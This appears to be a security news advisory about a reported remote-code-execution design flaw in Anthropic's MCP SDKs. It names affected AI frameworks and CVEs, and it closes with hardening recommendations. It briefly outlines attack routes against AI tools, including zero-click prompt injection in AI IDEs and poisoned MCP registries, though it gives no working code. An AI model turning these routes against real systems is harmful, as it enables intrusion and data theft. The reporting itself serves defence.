Critical Vulnerability in Anthropic’s MCP Exposes Millions to Remote Code Execution
A significant security flaw has been identified in Anthropic’s Model Context Protocol (MCP), potentially compromising over 150 million downloads and affecting approximately 200,000 servers. This vulnerability could allow attackers to gain full control over affected systems.
The OX Security Research team discovered that this flaw is rooted in the core design of Anthropic’s official MCP Software Development Kits (SDKs), which are available in multiple programming languages, including Python, TypeScript, Java, and Rust. Unlike typical coding errors, this issue is architectural, meaning that any developer utilizing Anthropic’s MCP framework inadvertently inherits this vulnerability.
Exploitation of this flaw enables Remote Code Execution (RCE) on any system running a vulnerable MCP implementation. Successful attacks could grant unauthorized access to sensitive user data, internal databases, API keys, and chat histories, effectively allowing complete control over the compromised environment.
Researchers have identified four primary methods of exploitation:
1. Unauthenticated UI Injection: Targeting popular AI frameworks without requiring authentication.
2. Hardening Bypasses: Compromising environments presumed to be secure, such as Flowise.
3. Zero-Click Prompt Injection: Affecting AI Integrated Development Environments (IDEs) like Windsurf and Cursor without user interaction.
4. Malicious Marketplace Distribution: Infiltrating MCP registries with malicious payloads; tests showed 9 out of 11 registries were susceptible.
OX Security confirmed successful command execution on six live production platforms, including critical vulnerabilities in LiteLLM, LangChain, and IBM’s LangFlow. This research has led to the identification of at least 10 Common Vulnerabilities and Exposures (CVEs) across multiple high-profile projects. Some critical flaws have been addressed, such as CVE-2026-30623 in LiteLLM and CVE-2026-33224 in Bisheng. However, other vulnerabilities remain unpatched, affecting tools like GPT Researcher, Agent Zero, Windsurf, and DocsGPT.
OX Security recommended that Anthropic implement a protocol-level patch to immediately protect millions of downstream users. Anthropic declined, stating that the behavior was expected. This response comes shortly after Anthropic’s announcement of Claude Mythos, a tool aimed at securing global software, highlighting the need for Anthropic to apply Secure by Design principles to its own infrastructure.
Recommendations to Protect Your Environment:
– Restrict Public Access: Limit public internet access to AI services connected to sensitive APIs or databases.
– Validate Inputs: Treat all external MCP configuration inputs as untrusted; block or restrict user-controlled inputs to STDIO parameters.
– Use Verified Sources: Install MCP servers only from trusted sources, such as the official GitHub MCP Registry.
– Implement Sandboxing: Run MCP-enabled services within sandboxes with restricted permissions.
– Monitor Activity: Keep an eye on all tool invocations for unexpected background activity or data exfiltration attempts.
– Update Regularly: Ensure all affected services are updated to their latest patched versions promptly.
OX Security has introduced platform-level detections to identify unsafe STDIO MCP configurations in customer codebases and AI-generated code.